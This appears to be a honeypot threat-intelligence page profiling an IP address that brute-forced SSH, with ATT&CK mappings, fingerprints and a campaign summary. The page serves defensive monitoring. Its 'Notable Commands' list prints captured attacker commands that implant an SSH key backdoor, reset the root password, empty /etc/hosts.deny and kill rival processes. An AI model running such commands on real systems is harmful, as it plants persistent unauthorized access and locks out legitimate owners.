IntrusionLabs IntrusionLabs
← Back to feed

195.60.175.119

TAGGED SUSPICIOUS how we decide →
Threat Confidence
53%
Location
🇺🇦 UA / Chernihiv
ASN
AS34814 · Osnova-Internet LLC
Cloud Provider
Total Events
238
Above average by volume
Agent Count
1
First / Last Seen
2026-04-26 04:23 — 2026-04-26 05:32
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595.002
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Discovery
T1082 T1083
Command and Control
T1105
External Corroboration
Not flagged by any external feeds
Campaigns
HASSH af8223ac9914… — SSH-2.0-libssh_0.12.0 (521 IPs, 71 countries) HASSH Active high 🇮🇩 ID
521 IPs 193219 events
ssh:bruteforce
2026-02-28 — ongoing · 521 IPs are running an identical SSH client (HASSH fingerprint af8223ac9914…). Top network: PT Cloud Hosting Indonesia (AS136052). …
Session Forensics
malware_dropper ×6 credential_probe ×8 opportunistic_bruter ×4
Sessions
18 (10 with login)
Avg Depth Score
0.53
Commands Executed
52
Files Downloaded
8
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:lVrwTm9Ee8EF"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
  • ls -lh $(which ls)
  • which ls
  • echo "root:B8WJDF9UkKNN"|chpasswd|bash
Fingerprints
HASSH
af8223ac9914f509afdadfaf5f7ee94e
SSH Client
SSH-2.0-libssh_0.12.0
Evidence Timeline
Credential Probe a4e750a6ea8f w4m_singapore_01 · 2026-04-26 05:32
1 20%
Loading events...
Credential Probe c1c17372edf4 w4m_singapore_01 · 2026-04-26 05:30
1 20%
Loading events...
Malware Dropper d8cea1adf589 w4m_singapore_01 · 2026-04-26 05:24
3 1 1 100%
Loading events...
Opportunistic Bruter 724524c69077 w4m_singapore_01 · 2026-04-26 05:24
1 50%
Loading events...
Credential Probe 3164714a6c4f w4m_singapore_01 · 2026-04-26 05:24
1 20%
Loading events...
Malware Dropper 095b05c30f9d w4m_singapore_01 · 2026-04-26 05:21
20 2 1 100%
Loading events...
Credential Probe f85263cce3f5 w4m_singapore_01 · 2026-04-26 05:15
1 20%
Loading events...
Malware Dropper 4ac530e9f445 w4m_singapore_01 · 2026-04-26 05:13
3 1 1 100%
Loading events...
Opportunistic Bruter 6bed7bbac6b1 w4m_singapore_01 · 2026-04-26 05:13
1 50%
Loading events...
Malware Dropper 60ee3064d793 w4m_singapore_01 · 2026-04-26 05:11
20 2 1 100%
Loading events...
Opportunistic Bruter e87f6a7f8525 w4m_singapore_01 · 2026-04-26 05:09
1 50%
Loading events...
Malware Dropper 14f3fde98f54 w4m_singapore_01 · 2026-04-26 05:09
3 1 1 100%
Loading events...
Malware Dropper 76cbbe50e3e1 w4m_singapore_01 · 2026-04-26 04:58
3 1 1 100%
Loading events...
Opportunistic Bruter c34e85c2d7c6 w4m_singapore_01 · 2026-04-26 04:59
1 50%
Loading events...
Credential Probe e5371d0c0775 w4m_singapore_01 · 2026-04-26 04:58
1 20%
Loading events...
Credential Probe 0845524043b8 w4m_singapore_01 · 2026-04-26 04:57
1 20%
Loading events...
Credential Probe b044ad139952 w4m_singapore_01 · 2026-04-26 04:46
1 20%
Loading events...
Credential Probe fe4594129832 w4m_singapore_01 · 2026-04-26 04:23
1 20%
Loading events...